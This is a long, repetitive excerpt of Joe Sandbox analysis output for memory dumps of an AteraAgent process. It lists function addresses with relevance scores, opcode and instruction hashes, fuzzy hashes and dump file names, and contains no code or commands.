                                                                                                                                                                                                                                                                                                • Opcode ID: fbf56beb754266e618ed4e85c56739ca7cc66a2dd60505bb64e87830294730a5
                                                                                                                                                                                                                                                                                                • Instruction ID: 141823631bd97e78a81fed4067f79602cd395501400c2a0bf6aacb33a3608342
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbf56beb754266e618ed4e85c56739ca7cc66a2dd60505bb64e87830294730a5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9111061262EF8A4AD365E37854217E167D1EF90314F4505AEC0DEC72E3EEA875448342
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3852FD Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: eca3cda9cb9257e8262a50d98fad2c334fa44945de561b2a2c522371a68f988f
                                                                                                                                                                                                                                                                                                • Instruction ID: f78a88fecc6019c396d54f673bdf32d9149eda0d5ced7f727b522385b2eaed6b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eca3cda9cb9257e8262a50d98fad2c334fa44945de561b2a2c522371a68f988f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4201262284F6CA1FD366AAB058621E57FA0EF06710F0600AAE048874A3D9A9574AC392
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39C755 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ef298519d4ad90d76d1862e0c64b66315deab8ad04b21a94a3bc0936ae62cf66
                                                                                                                                                                                                                                                                                                • Instruction ID: 46714ce1f214a30da56082d5106931b1564f3fe0d0b5f05d5f1e102ad31f98a2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef298519d4ad90d76d1862e0c64b66315deab8ad04b21a94a3bc0936ae62cf66
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B601A230A1DA484FE798EA6C94A97B5B7D1EF58301F5900FED418CB2E7DE296C408301
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38AE30 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6f7fba5064761a4b74f1469f19487eb008ebee6b16c3d53ee74d56511e4741fc
                                                                                                                                                                                                                                                                                                • Instruction ID: 00d5fd50bcba5a9576a04ccb3b0f860d69873cbc1fefa1b51c083325b0f8f461
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f7fba5064761a4b74f1469f19487eb008ebee6b16c3d53ee74d56511e4741fc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22016221B29E4E4BEBA8EB5C80649A673D1FF98200785497AD049C3299ED69EC418781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38BF80 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0ee32748485edab3d0c966bc1c802751566252845a0b005223b4668f54342190
                                                                                                                                                                                                                                                                                                • Instruction ID: 702cc2fd6a5401901053701a55758c4fe50a84137c43d96b75de0d496d5c1079
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ee32748485edab3d0c966bc1c802751566252845a0b005223b4668f54342190
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B601D631B28D0F4FEBA8EB689060AB673E1FFA8300B4445BAD019C3299ED65EC418741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B384228 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: faeddf832a8984881fe1c3b0d0e9cb5e744386c7de1199f506912a9d17196760
                                                                                                                                                                                                                                                                                                • Instruction ID: 899f174c6021f8f9634c22ee16c03ab6a74a1162e53b2d26ea06abeb6ebd5be4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: faeddf832a8984881fe1c3b0d0e9cb5e744386c7de1199f506912a9d17196760
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97F0F035E4990C8BEB20EED0A4003F8FBB4EB42354F01203EC00CA7150D73ADA91CB49
                                                                                                                                                                                                                                                                                                Function 00007FFD9B388A22 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 35df57129e6a3999fc8e6e88f845d55189a17824480de6bff72ceb25170908b6
                                                                                                                                                                                                                                                                                                • Instruction ID: b06ed05826791a715c52aeb30db35bc9fd938700a0252a86c423e028c0f033d4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35df57129e6a3999fc8e6e88f845d55189a17824480de6bff72ceb25170908b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F06D35D49A5E8BD720EE94A4102F9F7B8EB42354F01223AD40CA7190D77EDA96CB49
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59C354 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: cafe2a69939b33c6ee932f6de179bc7a6f4d6034f3b6174bc01dc95860bae4e9
                                                                                                                                                                                                                                                                                                • Instruction ID: 6be105b5caae104266fb7653338644ed8b635cd6064c4228c0d4f15a6f584c4b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafe2a69939b33c6ee932f6de179bc7a6f4d6034f3b6174bc01dc95860bae4e9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DF0BBA3B5EA1D0EF2B8966C35565B463C1DB8A660B95427FD95AC227BDC056D030280
                                                                                                                                                                                                                                                                                                Function 00007FFD9B384B89 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4847349a25e2bc262aa7c58f0413ecd4ce531418159f2937393fef3c5ad65961
                                                                                                                                                                                                                                                                                                • Instruction ID: fd496cddfecff9013a80109acc79e8e3b24af211aa9618b24cdb82d042c4740c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4847349a25e2bc262aa7c58f0413ecd4ce531418159f2937393fef3c5ad65961
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE01FC6190EACD5FD752EB6488651D87FB0EF45200F4602EBD048C71B3DD341A458701
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39AF30 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 893c78af5ede58d1b0e7e387209e8a79f8c6c30e47e4d2e9d9a00746dd642422
                                                                                                                                                                                                                                                                                                • Instruction ID: 030c2dae1a54a608237bd911baa3e78b3e059742cdc4e17d387eb67627003c4c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 893c78af5ede58d1b0e7e387209e8a79f8c6c30e47e4d2e9d9a00746dd642422
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C01A26191F7CD8FE796AA644C641B87FB0EF07300F0602EBD449CA0E3D9145A58C352
                                                                                                                                                                                                                                                                                                Function 00007FFD9B384DC8 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f7b754a48e2e08fa370ca47ea12526d0a7ceb746995b6e6f8cd33b89d148dcbc
                                                                                                                                                                                                                                                                                                • Instruction ID: 12a95164462c66500000b65c34a14a62309b19aeedafbf7e580d3c8a88d4916b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7b754a48e2e08fa370ca47ea12526d0a7ceb746995b6e6f8cd33b89d148dcbc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6010C31E05A098FDBA8EB58D8A0BA8B7B1EF58344F5041BAD00DE3295CE756D85CB01
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A0A0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5ff4e21bb8337ad8cbf1475a3ff54bc799c26016f7cba55b053702d060988d76
                                                                                                                                                                                                                                                                                                • Instruction ID: 2416c27e4e2a08948d8ea8d3920b3d2f241ae0e98f2b9f2e0df53b63ca9d0409
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ff4e21bb8337ad8cbf1475a3ff54bc799c26016f7cba55b053702d060988d76
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BF09B3171D81C5FA668E55CBC4D9727BD8D79A136711027FF84DC3172ED425C538254
                                                                                                                                                                                                                                                                                                Function 00007FFD9B399753 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 10a2a1292982eb866423495858021d5d87e05bd3f54eb65b247f0d5253c24225
                                                                                                                                                                                                                                                                                                • Instruction ID: c94a6124e9ffba858b0c5df22e4a3af21018b4c37c9dd3ae8c590991447fc267
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10a2a1292982eb866423495858021d5d87e05bd3f54eb65b247f0d5253c24225
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5401812160A98C8FE7A5EA28D4AC7A9B7E1FF95301F5506B9D04DC72A5CB356C40C700
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3825AB Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6ee60b6086d63502f90af0eb37c835399254028ae808e9998c117cf30ed10404
                                                                                                                                                                                                                                                                                                • Instruction ID: 21797a8a662755be02b5612aa2202d4006fdafecc6c85f4a3b374b8174d7ee63
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ee60b6086d63502f90af0eb37c835399254028ae808e9998c117cf30ed10404
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C01DA71E1951D8EEBA4EB98D8987E9B3A1EB99300F4001E5900DD2251DE346D85CF41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39C5FF Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 59e85bd461288d90fb087b7474e4c8408c5fc948d9a2f5f460b6192a2136746d
                                                                                                                                                                                                                                                                                                • Instruction ID: c9e9a4fd925f32c43299cd7c3316bc58a6a1e4fbf69e2cee218f55639b49a033
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59e85bd461288d90fb087b7474e4c8408c5fc948d9a2f5f460b6192a2136746d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DF02B11B0E55D5BFA38B4FD58183BABAC4EF89365F16013FD00D811A0DD5879828381
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38DD08 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 15f1a3361c559bcc0bb6a99734121534d655f8a9963aec97b101df262ce9cccf
                                                                                                                                                                                                                                                                                                • Instruction ID: e15da0fe60ea552a2ca001eba45b68e5bce6b4ddecb2630f977cac1ce8cd58fa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15f1a3361c559bcc0bb6a99734121534d655f8a9963aec97b101df262ce9cccf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BF0243260AE0E0FDB90EAAC9494960F392FFA8310755076EC008CB220D921ED9A8742
                                                                                                                                                                                                                                                                                                Function 00007FFD9B394121 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1788a4ade38bb863666c048e0e3c84ca3a5adfc956c1f69ad87a255349a0baa8
                                                                                                                                                                                                                                                                                                • Instruction ID: 637913412ae4af1fe86e3ec228c31996ceb284b7592de81f993fb5d87ec731c1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1788a4ade38bb863666c048e0e3c84ca3a5adfc956c1f69ad87a255349a0baa8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F0F662A0A6CD8FE7B2E66894757E13BA0EF51310F0501FBD04CD6193EE242A05C740
                                                                                                                                                                                                                                                                                                Function 00007FFD9B389E95 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 450115debacd82605fe422f778e04d081bdb804d10dc602f5e552051d3dba081
                                                                                                                                                                                                                                                                                                • Instruction ID: 8f6ffac09dd87d9c438f33220e875387a4fffaa9fbd6870d7f3d6085ae626ec8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 450115debacd82605fe422f778e04d081bdb804d10dc602f5e552051d3dba081
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79F0E202F0FE8E0FD262E2AC18781A81BD2DBA512034E12FBC548C72A3EC1D5D424382
                                                                                                                                                                                                                                                                                                Function 00007FFD9B384B1D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7e290fa4ca8b2e65896046f8e80bb8b3cbb8af4d921e97d5f1dd0d7f52cea425
                                                                                                                                                                                                                                                                                                • Instruction ID: 80c0b750647f68419c2e40255cdbba0bbc50d4dbaaf481692fc13af64b9e06ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e290fa4ca8b2e65896046f8e80bb8b3cbb8af4d921e97d5f1dd0d7f52cea425
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7501D63090AA8D8FDB55EF64C8612E97BA1FF55300F0204BDE40CC76A2DA75E950C781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38AF99 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: aa41d693d6f5eb628d5e26320e1f519c8d6719c094f661bdc0aa88e26767199c
                                                                                                                                                                                                                                                                                                • Instruction ID: 97ee5662ed1e9d5304d4f230b6e1084681c1ab8c09471096e11d52a5b1e94143
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa41d693d6f5eb628d5e26320e1f519c8d6719c094f661bdc0aa88e26767199c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D01D13092DBCD4FEB46EF6888280B97FF0FF5A200F0504EBD458C72A2DAB559148741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B394F25 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 48facf7f1bc51c4de3772fbbe9ec747426d34f736bed72dca7d1f588d6664adb
                                                                                                                                                                                                                                                                                                • Instruction ID: 78a62807dd4e971f910eef5314d4465a362e5c78966f1ac46f3e4cd96b7a7deb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48facf7f1bc51c4de3772fbbe9ec747426d34f736bed72dca7d1f588d6664adb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89F0E93191EA4F4FD379F76C85556A077E0FF08350B5A06AED449CB2A2EF18ED918780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B390F02 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ab8f8d497795efdda59d69bb2d9a8b76a995602398ffa7baa314556e84ef0ab7
                                                                                                                                                                                                                                                                                                • Instruction ID: 5be45466c244d8a10d4d557a374b74e6c72fd999721749f937092e4a7c9d10da
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab8f8d497795efdda59d69bb2d9a8b76a995602398ffa7baa314556e84ef0ab7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3F02D2150EACE1FD366E76894245A07BF0EF45300B0E01FAC488C71A3D918AA948351
                                                                                                                                                                                                                                                                                                Function 00007FFD9B383E50 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
